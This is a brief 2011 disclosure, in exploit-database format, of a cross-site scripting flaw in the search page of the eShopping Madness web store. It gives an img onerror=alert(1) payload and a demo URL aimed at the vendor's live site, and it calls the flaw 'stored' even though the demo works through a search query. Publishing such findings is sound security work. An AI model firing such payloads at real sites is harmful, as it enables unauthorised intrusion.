# Exploit Title: eShopping Madness Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

Cross Site Scripting can be done using the command input

Vulnerable Page:
search.php (Search Modules)

Exploit:
"/></a></><img src=1.gif onerror=alert(1)>

Demo:
http://www.eshoppingmadness.com/search.php?s=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E


Thanks,


Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr